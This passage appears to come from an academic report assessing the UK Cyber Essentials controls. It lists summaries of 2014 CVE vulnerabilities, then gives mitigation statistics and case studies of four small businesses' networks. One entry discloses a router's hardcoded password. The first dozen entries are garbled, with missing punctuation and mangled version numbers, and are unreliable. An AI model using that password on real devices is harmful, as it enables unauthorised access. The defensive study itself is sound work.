CVE-2014-0313rdquoMicrosoft Internet Explorer 10 and 11allows remote attackers to execute arbitrarycode or cause a denial of service (memorycorruption) via a crafted web site akardquordquoInternet Explorer Memory CorruptionVulnerabilityrdquordquo a different vulnerabilitythan CVE-2014-0321rdquo

CVE-2014-0354The ZyXEL Wireless N300 NetUSB NBG-419N router with firmware 100(BFQ6)C0has a hardcoded password of qweasdzxcfor an unspecified account which allowsremote attackers to obtain indexasp loginaccess via an HTTP request

CVE-2014-0362Cross-site scripting (XSS) vulnerability

on Google Search Appliance (GSA)devices before 7014G216 and 72 before720G114 when dynamic navigation isconfigured allows remote attackers to injectarbitrary web script or HTML via inputincluded in a SCRIPT element

CVE-2014-0433Unspecified vulnerability in the MySQLServer component in Oracle MySQL 5613and earlier allows remote attackers to affectavailability via unknown vectors related toThread Pooling

CVE-2014-0488rdquoAPT before 109 does not rdquordquoinvalidaterepository datardquordquo when moving from anunauthenticated to authenticated statewhich allows remote attackers to haveunspecified impact via crafted repositorydatardquo

CVE-2014-0493Adobe Reader and Acrobat 10x before1019 and 11x before 11006 on Windowsand Mac OS X allow attackers to executearbitrary code or cause a denial of service(memory corruption) via unspecified vectorsa different vulnerability than CVE-2014-0495

CVE-2014-0494Adobe Digital Editions 201 allowsattackers to execute arbitrary code or causea denial of service (memory corruption andapplication crash) via unspecified vectors

CVE-2014-0498Stack-based buffer overflow in AdobeFlash Player before 117700269 and118x through 120x before 120070on Windows and Mac OS X and before112202341 on Linux Adobe AIR before4001628 on Android Adobe AIR SDKbefore 4001628 and Adobe AIR SDK ampCompiler before 4001628 allows attackersto execute arbitrary code via unspecifiedvectors

CVE-2014-0515Buffer overflow in Adobe Flash Playerbefore 117700279 and 118x through130x before 1300206 on Windows andOS X and before 112202356 on Linuxallows remote attackers to execute arbitrarycode via unspecified vectors as exploitedin the wild in April 2014

CVE-2014-0533Cross-site scripting (XSS) vulnerability inAdobe Flash Player before 1300223 and14x before 1400125 on Windows and OSX and before 112202378 on Linux AdobeAIR before 1400110 Adobe AIR SDKbefore 1400110 and Adobe AIR SDK ampCompiler before 1400110 allows remoteattackers to inject arbitrary web script orHTML via unspecified vectors a differentvulnerability than CVE-2014-0531 and CVE-2014-0532

CVE-2014-0536Adobe Flash Player before 1300223 and14x before 1400125 on Windows and OSX and before 112202378 on Linux AdobeAIR before 1400110 Adobe AIR SDKbefore 1400110 and Adobe AIR SDK ampCompiler before 1400110 allow attackersto execute arbitrary code or cause a denial ofservice (memory corruption) via unspecifiedvectors

CVE-2014-0562: Cross-site scripting (XSS) vulnerability in Adobe Reader and Acrobat 10.x before 10.1.12 and 11.x before 11.0.09 on OS X allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, aka "Universal XSS (UXSS)".

CVE-2014-0577: Adobe Flash Player before 13.0.0.252 and 14.x and 15.x before 15.0.0.223 on Windows and OS X and before 11.2.202.418 on Linux, Adobe AIR before 15.0.0.356, Adobe AIR SDK before 15.0.0.356, and Adobe AIR SDK & Compiler before 15.0.0.356 allow attackers to execute arbitrary code by leveraging an unspecified "type confusion", a different vulnerability than CVE-2014-0584, CVE-2014-0585, CVE-2014-0586, and CVE-2014-0590.

CVE-2014-0765: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long GotoCmd argument.

CVE-2014-0767: Stack-based buffer overflow in Advantech WebAccess before 7.2 allows remote attackers to execute arbitrary code via a long AccessCode argument.

CVE-2014-0783: Stack-based buffer overflow in BKHOdeq.exe in Yokogawa CENTUM CS 3000 R3.09.50 and earlier allows remote attackers to execute arbitrary code via a crafted TCP packet.

CVE-2014-1330: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.

CVE-2014-1342: WebKit, as used in Apple Safari before 6.1.4 and 7.x before 7.0.4, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-05-21-1.

CVE-2014-1349: Use-after-free vulnerability in Safari in Apple iOS before 7.1.2 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via an invalid URL.

CVE-2014-1356: Heap-based buffer overflow in launchd in Apple iOS before 7.1.2, Apple OS X before 10.9.4, and Apple TV before 6.1.2 allows attackers to execute arbitrary code via a crafted application that sends IPC messages.

CVE-2014-1370: The byte-swapping implementation in copyfile in Apple OS X before 10.9.4 allows remote attackers to execute arbitrary code or cause a denial of service (out-of-bounds memory access and application crash) via a crafted AppleDouble file in a ZIP archive.

CVE-2014-1379: Graphics Drivers in Apple OS X before 10.9.4 allows attackers to gain privileges or cause a denial of service (NULL pointer dereference and system crash) via a 32-bit executable file for a crafted application.

CYBER SECURITY CONTROLS EFFECTIVENESS - Security Lancaster Page 23 of 28

CVE-2014-1382: WebKit, as used in Apple iOS before 7.1.2, Apple Safari before 6.1.5 and 7.x before 7.0.5, and Apple TV before 6.1.2, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site, a different vulnerability than other WebKit CVEs listed in APPLE-SA-2014-06-30-1, APPLE-SA-2014-06-30-3, and APPLE-SA-2014-06-30-4.

CVE-2014-1466: SQL injection vulnerability in CSP MySQL User Manager 2.3 allows remote attackers to execute arbitrary SQL commands via the login field of the login page.

CVE-2014-1472: Multiple cross-site scripting (XSS) vulnerabilities in the Enterprise Manager in McAfee Vulnerability Manager (MVM) 7.5.5 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.

CVE-2014-1477: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 27.0, Firefox ESR 24.x before 24.3, Thunderbird before 24.3, and SeaMonkey before 2.24 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2014-1518: Multiple unspecified vulnerabilities in the browser engine in Mozilla Firefox before 29.0, Firefox ESR 24.x before 24.5, Thunderbird before 24.5, and SeaMonkey before 2.26 allow remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via unknown vectors.

CVE-2014-1563: Use-after-free vulnerability in the mozilla::DOMSVGLength::GetTearOff function in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 allows remote attackers to execute arbitrary code or cause a denial of service (heap memory corruption) via an SVG animation with DOM interaction that triggers incorrect cycle collection.

CVE-2014-1565: The mozilla::dom::AudioEventTimeline function in the Web Audio API implementation in Mozilla Firefox before 32.0, Firefox ESR 31.x before 31.1, and Thunderbird 31.x before 31.1 does not properly create audio timelines, which allows remote attackers to obtain sensitive information from process memory or cause a denial of service (out-of-bounds read) via crafted API calls.

CVE-2014-1586: content/base/src/nsDocument.cpp in Mozilla Firefox before 33.0, Firefox ESR 31.x before 31.2, and Thunderbird 31.x before 31.2 does not consider whether WebRTC video sharing is occurring, which allows remote attackers to obtain sensitive information from the local camera in certain IFRAME situations by maintaining a session after the user temporarily navigates away.

CVE-2014-1701: The GenerateFunction function in bindings/scripts/code_generator_v8.pm in Blink, as used in Google Chrome before 33.0.1750.149, does not implement a certain cross-origin restriction for the EventTarget::dispatchEvent function, which allows remote attackers to conduct Universal XSS (UXSS) attacks via vectors involving events.

CVE-2014-1740: Multiple use-after-free vulnerabilities in net/websockets/websocket_job.cc in the WebSockets implementation in Google Chrome before 34.0.1847.137 allow remote attackers to cause a denial of service or possibly have unspecified other impact via vectors related to WebSocketJob deletion.

CVE-2014-1744: Integer overflow in the AudioInputRendererHost::OnCreateStream function in content/browser/renderer_host/media/audio_input_renderer_host.cc in Google Chrome before 35.0.1916.114 allows remote attackers to cause a denial of service or possibly have unspecified other impact via vectors that trigger a large shared-memory allocation.

CVE-2014-1753: Microsoft Internet Explorer 6 through 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-1806: The .NET Remoting implementation in Microsoft .NET Framework 1.1 SP1, 2.0 SP2, 3.5, 3.5.1, 4, 4.5, and 4.5.1 does not properly restrict memory access, which allows remote attackers to execute arbitrary code via vectors involving malformed objects, aka "TypeFilterLevel Vulnerability".

CVE-2014-1808: Microsoft Office 2013 Gold, SP1, RT, and RT SP1 allows remote attackers to obtain sensitive token information via a web site that sends a crafted response during opening of an Office document, aka "Token Reuse Vulnerability".

CVE-2014-1811: The TCP implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allows remote attackers to cause a denial of service (non-paged pool memory consumption and system hang) via malformed data in the Options field of a TCP header, aka "TCP Denial of Service Vulnerability".

CVE-2014-1812: The Group Policy implementation in Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 does not properly handle distribution of passwords, which allows remote authenticated users to obtain sensitive credential information and consequently gain privileges by leveraging access to the SYSVOL share, as exploited in the wild in May 2014, aka "Group Policy Preferences Password Elevation of Privilege Vulnerability".

CVE-2014-2014: imapsync before 1.584, when running with the --tls option, attempts a cleartext login when a certificate verification failure occurs, which allows remote attackers to obtain credentials by sniffing the network.

CVE-2014-2103: Cisco Intrusion Prevention System (IPS) Software allows remote attackers to cause a denial of service (MainApp process outage) via malformed SNMP packets, aka Bug IDs CSCum52355 and CSCul49309.

CVE-2014-2109: The TCP Input module in Cisco IOS 12.2 through 12.4 and 15.0 through 15.4, when NAT is used, allows remote attackers to cause a denial of service (memory consumption or device reload) via crafted TCP packets, aka Bug IDs CSCuh33843 and CSCuj41494.

CVE-2014-2364: Multiple stack-based buffer overflows in Advantech WebAccess before 7.2 allow remote attackers to execute arbitrary code via a long string in the (1) ProjectName, (2) SetParameter, (3) NodeName, (4) CCDParameter, (5) SetColor, (6) AlarmImage, (7) GetParameter, (8) GetColor, (9) ServerResponse, (10) SetBaud, or (11) IPAddress parameter to an ActiveX control in (a) webvact.ocx, (b) dvs.ocx, or (c) webdact.ocx.

CVE-2014-2416: Unspecified vulnerability in the Oracle Data Integrator component in Oracle Fusion Middleware 11.1.1.3.0 allows remote attackers to affect availability via unknown vectors related to Data Quality, a different vulnerability than CVE-2014-2407, CVE-2014-2415, CVE-2014-2417, and CVE-2014-2418.

CVE-2014-2554: OTRS 3.1.x before 3.1.21, 3.2.x before 3.2.16, and 3.3.x before 3.3.6 allows remote attackers to conduct clickjacking attacks via an IFRAME element.

CVE-2014-2643: Unspecified vulnerability in HP Systems Insight Manager (SIM) before 7.4 allows remote authenticated users to gain privileges via unknown vectors.

CVE-2014-2742: Isode M-Link before 16.0v7 does not properly restrict the processing of compressed XML elements, which allows remote attackers to cause a denial of service (resource consumption) via a crafted XMPP stream, aka an "xmppbomb" attack.

CVE-2014-2768: Microsoft Internet Explorer 6 through 8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2773.

CVE-2014-2789: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2795, CVE-2014-2798, and CVE-2014-2804.

CVE-2014-2791: Microsoft Internet Explorer 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-2794: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2788.

CVE-2014-2808: Microsoft Internet Explorer 10 and 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2796, CVE-2014-2825, CVE-2014-4050, CVE-2014-4055, and CVE-2014-4067.

CVE-2014-2821: Microsoft Internet Explorer 8 and 9 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-3444: The GetGUID function in codecs/dmp4.dll in RealNetworks RealPlayer 16.0.3.51 and earlier allows remote attackers to execute arbitrary code or cause a denial of service (write access violation and application crash) via a malformed 3gp file.

CVE-2014-3489: lib/util/miq-password.rb in Red Hat CloudForms 3.0 Management Engine (CFME) before 5.2.4.2 uses a hard-coded salt, which makes it easier for remote attackers to guess passwords via a brute force attack.

CVE-2014-3507: Memory leak in d1_both.c in the DTLS implementation in OpenSSL 0.9.8 before 0.9.8zb, 1.0.0 before 1.0.0n, and 1.0.1 before 1.0.1i allows remote attackers to cause a denial of service (memory consumption) via zero-length DTLS fragments that trigger improper handling of the return value of a certain insert function.

CVE-2014-3556: The STARTTLS implementation in mail/ngx_mail_smtp_handler.c in the SMTP proxy in nginx 1.5.x and 1.6.x before 1.6.1 and 1.7.x before 1.7.4 does not properly restrict I/O buffering, which allows man-in-the-middle attackers to insert commands into encrypted SMTP sessions by sending a cleartext command that is processed after TLS is in place, related to a "plaintext command injection" attack, a similar issue to CVE-2011-0411.

CVE-2014-3580: The mod_dav_svn Apache HTTPD server module in Apache Subversion 1.x before 1.7.19 and 1.8.x before 1.8.11 allows remote attackers to cause a denial of service (NULL pointer dereference and server crash) via a REPORT request for a resource that does not exist.

CVE-2014-3814: The Juniper Networks NetScreen Firewall devices with ScreenOS before 6.3r17, when configured to use the internal DNS lookup client, allows remote attackers to cause a denial of service (crash and reboot) via a sequence of malformed packets to the device IP.

CVE-2014-3819: Juniper Junos 11.4 before 11.4R12, 12.1 before 12.1R10, 12.1X44 before 12.1X44-D35, 12.1X45 before 12.1X45-D25, 12.1X46 before 12.1X46-D20, 12.1X47 before 12.1X47-D10, 12.2 before 12.2R8, 12.3 before 12.3R7, 13.1 before 13.1R4, 13.2 before 13.2R4, 13.3 before 13.3R2, and 14.1 before 14.1R1, when Auto-RP is enabled, allows remote attackers to cause a denial of service (RDP routing process crash and restart) via a malformed PIM packet.

CVE-2014-3872: Multiple SQL injection vulnerabilities in the administration login page in D-Link DAP-1350 (Rev. A1) with firmware 1.14 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) username or (2) password.

CVE-2014-4044: OpenAFS 1.6.8 does not properly clear the fields in the host structure, which allows remote attackers to cause a denial of service (uninitialized memory access and crash) via unspecified vectors related to TMAY requests.

CVE-2014-4079: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4082: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-4100: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4103, CVE-2014-4104, CVE-2014-4105, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4105: Microsoft Internet Explorer 6 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-2799, CVE-2014-4059, CVE-2014-4065, CVE-2014-4079, CVE-2014-4081, CVE-2014-4083, CVE-2014-4085, CVE-2014-4088, CVE-2014-4090, CVE-2014-4094, CVE-2014-4097, CVE-2014-4100, CVE-2014-4103, CVE-2014-4104, CVE-2014-4106, CVE-2014-4107, CVE-2014-4108, CVE-2014-4109, CVE-2014-4110, and CVE-2014-4111.

CVE-2014-4114: Microsoft Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1 allow remote attackers to execute arbitrary code via a crafted OLE object in an Office document, as exploited in the wild with a "Sandworm" attack in June through October 2014, aka "Windows OLE Remote Code Execution Vulnerability".

CVE-2014-4127: Microsoft Internet Explorer 6 through 10 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-4130: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-4132 and CVE-2014-4138.

CVE-2014-4132: Microsoft Internet Explorer 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-4130 and CVE-2014-4138.

CVE-2014-4133: Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability", a different vulnerability than CVE-2014-4137.

CVE-2014-4141: Microsoft Internet Explorer 8 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-4481: Integer overflow in CoreGraphics in Apple iOS before 8.1.3, Apple OS X before 10.10.2, and Apple TV before 7.0.3 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted PDF document.

CVE-2014-4617: The do_uncompress function in g10/compress.c in GnuPG 1.x before 1.4.17 and 2.x before 2.0.24 allows context-dependent attackers to cause a denial of service (infinite loop) via malformed compressed packets, as demonstrated by an a3 01 5b ff byte sequence.

CVE-2014-4631: RSA Adaptive Authentication (On-Premise) 6.0.2.1 through 7.1 P3, when using device binding in a Challenge SOAP call or using the RSA Adaptive Authentication Integration Adapters with Out-of-Band Phone (Authentify) functionality, conducts permanent device binding even when authentication fails, which allows remote attackers to bypass authentication.

CVE-2014-5528: The Appsflyer library for Android does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate.

CVE-2014-6040: GNU C Library (aka glibc) before 2.20 allows context-dependent attackers to cause a denial of service (out-of-bounds read and crash) via a multibyte character value of "0xffff" to the iconv function when converting (1) IBM933, (2) IBM935, (3) IBM937, (4) IBM939, or (5) IBM1364 encoded data to UTF-8.

CVE-2014-6105: IBM Security Identity Manager 6.x before 6.0.0.3 IF14 allows remote attackers to conduct clickjacking attacks via unspecified vectors.

CVE-2014-6136: IBM Security AppScan Standard 8.x and 9.x before 9.0.1.1 FP1 supports unencrypted sessions, which allows remote attackers to obtain sensitive information by sniffing the network.

CVE-2014-6164: IBM WebSphere Application Server 8.0.x before 8.0.0.10 and 8.5.x before 8.5.5.4 allows remote attackers to spoof OpenID and OpenID Connect cookies and consequently obtain sensitive information via a crafted URL.

CVE-2014-6363: vbscript.dll in Microsoft VBScript 5.6 through 5.8, as used with Internet Explorer 6 through 11 and other products, allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "VBScript Memory Corruption Vulnerability".

CVE-2014-6369: Microsoft Internet Explorer 9 through 11 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted web site, aka "Internet Explorer Memory Corruption Vulnerability".

CVE-2014-6378: Juniper Junos 11.4 before R12-S4, 12.1X44 before D35, 12.1X45 before D30, 12.1X46 before D25, 12.1X47 before D10, 12.2 before R9, 12.2X50 before D70, 12.3 before R7, 13.1 before R4 before S3, 13.1X49 before D55, 13.1X50 before D30, 13.2 before R5, 13.2X50 before D20, 13.2X51 before D26 and D30, 13.2X52 before D15, 13.3 before R3, and 14.1 before R1 allows remote attackers to cause a denial of service (router protocol daemon crash) via a crafted RSVP PATH message.

CVE-2014-6487: Unspecified vulnerability in the Oracle Identity Manager component in Oracle Fusion Middleware 11.1.1.5, 11.1.1.7, 11.1.2.1, and 11.1.2.2 allows remote authenticated users to affect integrity via unknown vectors related to End User Self Service.

CVE-2014-7250: The TCP stack in 4.3BSD Net/2, as used in FreeBSD 5.4, NetBSD possibly 2.0, and OpenBSD possibly 3.6, does not properly implement the session timer, which allows remote attackers to cause a denial of service (resource consumption) via crafted packets.

CVE-2014-7927: The SimplifiedLowering::DoLoadBuffer function in compiler/simplified-lowering.cc in Google V8, as used in Google Chrome before 40.0.2214.91, does not properly choose an integer data type, which allows remote attackers to cause a denial of service (memory corruption) or possibly have unspecified other impact via crafted JavaScript code.

CVE-2014-7945: OpenJPEG before r2908, as used in PDFium in Google Chrome before 40.0.2214.91, allows remote attackers to cause a denial of service (out-of-bounds read) via a crafted PDF document, related to j2k.c, jp2.c, and t2.c.

CVE-2014-8447: Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2014-8445, CVE-2014-8446, CVE-2014-8456, CVE-2014-8458, CVE-2014-8459, CVE-2014-8461, and CVE-2014-9158.

CVE-2014-8638: The navigator.sendBeacon implementation in Mozilla Firefox before 35.0, Firefox ESR 31.x before 31.4, Thunderbird before 31.4, and SeaMonkey before 2.32 omits the CORS Origin header, which allows remote attackers to bypass intended CORS access-control checks and conduct cross-site request forgery (CSRF) attacks via a crafted web site.

CVE-2014-8835: The xpc_data_get_bytes function in libxpc in Apple OS X before 10.10.2 does not verify that a dictionary's Attributes key has the xpc_data data type, which allows attackers to execute arbitrary code by providing a crafted dictionary to sysmond, related to an "XPC type confusion" issue.

CVE-2014-9159: Heap-based buffer overflow in Adobe Reader and Acrobat 10.x before 10.1.13 and 11.x before 11.0.10 on Windows and OS X allows attackers to execute arbitrary code via unspecified vectors, a different vulnerability than CVE-2014-8457 and CVE-2014-8460.

CVE-2014-9163: Stack-based buffer overflow in Adobe Flash Player before 13.0.0.259 and 14.x and 15.x before 15.0.0.246 on Windows and OS X and before 11.2.202.425 on Linux allows attackers to execute arbitrary code via unspecified vectors, as exploited in the wild in December 2014.

CVE-2014-9350: TP-Link TL-WR740N 4 with firmware 3.17.0 Build 140520, 3.16.6 Build 130529, and 3.16.4 Build 130205 allows remote attackers to cause a denial of service (httpd crash) via vectors involving a "new" value in the isNew parameter to PingIframeRpm.htm.

CVE-2014-9357: Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build in a Dockerfile in an LZMA (.xz) archive, related to the chroot for archive extraction.

Survey Responses


Analysis

The analysis of the data collected has been split into sections. Firstly, each of the vulnerabilities has been assessed to ascertain its mitigation with and without the use of the Cyber Essentials controls; this supposes a case where any software or hardware source of a vulnerability is in use (i.e. a worst-case, fully inclusive assessment).

What follows is an analysis of the information gathered from interviews. Four SMEs from distinct industries are detailed in terms of physical infrastructure and service usage, as well as current user access policies and existing security measures in place. A summary of the mitigation results for vulnerabilities in the software and hardware used in each SME network configuration is included.

The full table for the applicability of all CVE vulnerabilities to each of the network structures can be found in the CVE Details section on page 19.

Finally, the data collected from the survey is analysed and used to develop a general-case network model; the SME networks are compared to this to better understand the nuances of each market sector as well as the overall typical configuration of SMEs.

Full Vulnerabilities Assessment

Of the entire list of 200 vulnerabilities from 2013 and 2014 deemed applicable to the study and chosen for analysis, 131 vulnerabilities were mitigated with the use of the Cyber Essentials security tools, 61 vulnerabilities were partially mitigated and 8 were not mitigated.

Figure 4: Percentage of Full Vulnerabilities List Mitigated

Partially Mitigated. 59 of the 61 CVEs judged as partially mitigated are classed as such because they rely on patches from third-party software or hardware vendors, but will be mitigated once a security fix has been released. Regardless of the level of security tools deployed on a network, the security involved in using third-party software unfortunately relies on the vendor's ability to identify potential areas of risk, as well as to respond quickly to security breaches as they become apparent with the release of patches. All software installed on an SME network should be periodically reviewed to decide whether it is necessary, or whether there are more suitable and potentially more secure solutions available.

The other two partially mitigated vulnerabilities rely on website blacklisting combined with avoiding vulnerable web browser software. A secure configuration without such a browser would mitigate these vulnerabilities, but, as in the Web Development SME case study, it may not always be possible to avoid the use of a specific piece of software. In such a case, website blacklisting is the only defence against the vulnerabilities.

Not Mitigated - Secure Configuration. Some vulnerabilities have been found to be unmitigatable using the CE controls; in each of the cases found, this is due to inherent flaws in a hardware device or software that cannot be fixed by a security patch or firmware update.

For these devices that are fundamentally flawed from a cyber-security standpoint, it can be that no level of security tools on top of the network can aid in mitigation; rather, the hardware should be replaced to ensure network security. It may be possible for a public list of all such devices to be developed as part of the government cyber-security scheme, to serve as a device blacklist for SMEs.

Case Studies

Four SMEs were interviewed to build paper models upon which the Cyber Essentials controls may be assessed. Some detail on the physical structure, usage and existing security of each network is provided.

• SME Network One represents a finance specialist SME using a combination of externally managed services for banking, in addition to internal, remotely accessible services for employees.

• SME Network Two represents a specialist SME utilising an off-site, remotely managed server for administrator services and cloud-based services for employees.

• SME Network Three represents a web services SME that accesses client servers frequently and utilises cloud-based services daily.

• SME Network Four represents a hospitality services provider with a very small company network co-located with a very large guest network component, where all of the services are remotely managed and located.

SME Network One - Finance Sector

Physical Infrastructure. The company interviewed comprised around 20 employees located at 3 sites nationally.

Remote workers connect over normal internet connections, both residential and commercial, and use both VPN and non-VPN traffic (specifically web traffic on port 80) to access services supplied by the company.

Figure 5: SME-1 Network

The hardware at the head office (where the interview was carried out) consists of equipment by 3Com, Draytek, BT and Huawei for infrastructure components. Employees use a range of machines bought between 2011 and 2014, comprising a mix of Dell and Lenovo PCs.

As most of the infrastructure is passive (most of the traffic is handled by a single 3Com BaseT-1000 switch), the firmware on the equipment is unchanged from purchase, if any firmware is present at all.

Services. At the head office site a Windows file server (SAMBA) provides local file sharing and allows remote users to access the same files via VPN. The mail server, a Microsoft Exchange Server, is an off-site deployment managed by an external company, but is a dedicated server for only this company.

Additionally, a web service and database server is run from a server at the site. This provides local HTTP access to the database it runs, and has firewall rules in place to allow external access to the same system for off-site employees.

Numerous other pieces of banking software are run on bank-owned remote servers and are accessed and secured via combinations of smart cards and PIN entry devices, also supplied by the banks.

User Access. Employees are permitted to access the internet from both their individual workstations and additional devices such as smart phones (although technically this is not permitted by policy, the policy is not strictly enforced). Internet access is, however, slightly filtered, with access to Facebook being blocked by the router.

Access logs for any network operations are not created, and any machine in the office can access the network, with no isolated islands.

User accounts can be migrated between machines via a Domain Controller, but in practice this is unlikely to actually happen, with users generally using their own machines.

Operating systems. Locally everything is Windows 7; the remote site uses Windows 7; 2 remote machines are Windows 8.1.

Mitigation of applicable vulnerabilities. Of the 200 listed vulnerabilities, 119 were applicable to the first SME network.

Figure 6: SME-1 Vulnerability Mitigation

Because much of this SME's operations are done via browser-based interfaces to other financial companies (such as banks), it places them in the firing line for a large number of the browser-based attacks. Furthermore, as some banks require specific browser versions for their interfaces to work, they end up with several different browsers, with several versions of each, to cover all their requirements, opening them up multiple times to browser-based vectors.

Additionally, the heavy use of SSL-based communication places them in a position where any SSL vulnerabilities affect them too.

SME Network Two - Specialist Group

Physical Infrastructure. The second SME participant employs 20-25 people based across multiple offices in one building.

Employees may bring their own devices or use a workstation provided. Workstations are connected to one of four switches via Ethernet and share a virtual LAN with other employee devices. An off-site server containing sensitive data is accessible only to administrators via SSH.

Network equipment includes an external Dell PowerEdge server, four TP-Link switch access points and a TP-Link DHCP router.

Figure 7: SME-2 Network

Services. Employee devices sharing the network can use Windows folder sharing. Employee devices run the OSs OS X, Windows XP, Windows 7 & Windows 8, with auto-updates enabled.

Some employees use a VPN to connect to another network for a data service. All other services are provided by cloud servers via HTTPS: email, files & database, as well as management tools; these are used daily.

User Access. Employees have no restriction on their internet access and may use their own equipment. Administrators often access a remote server database and file store acting as a web server. Guests may access a separate Wi-Fi network through the same access points as other office workers, but do not share the same virtual LAN as employees. Wi-Fi access logs are gathered, but no other user activity. Employees can access the network from any machine, but the SME's policy is that all machines should have anti-malware and strong passwords, which are recommended to be changed periodically, with the employee machines configured to automatically lock after a period of inactivity.

Mitigation of applicable vulnerabilities. Of the 200 listed vulnerabilities, 79 were applicable to the second SME network.

Figure 8: SME-2 Vulnerability Mitigation

The specialist SME had the fewest overall potential vulnerabilities, largely owed to a higher reliance on cloud-based services. Although this reduces the risk from inherent vulnerability in a network, responsibility is handed on to the chosen service provider. A certified and reputable cloud services provider should thus be sought to ensure protection through the entire chain.

SME Network Three - Web Development

Physical Infrastructure. SME-3 employs 10 workers based in one building.

Employees are restricted from using their own devices unless validated by the company head, in which case no others may share that device. Workstations are connected to one switch via Ethernet and share a virtual LAN with other employee devices.

Network equipment includes an external Dell PowerEdge server, one TP-Link switch access point and a TP-Link DHCP router.

Figure 9: SME-3 Network

Services. Employee devices sharing the network can use Windows folder sharing. Employee devices run the OSs OS X, Windows 7 & Windows 8, with auto-updates enabled.

All services are provided by cloud servers via HTTPS: email, files & database, as well as management tools; these are used daily.

User Access. Employees have no restriction on their internet access and commonly use all major browsers for compatibility testing.

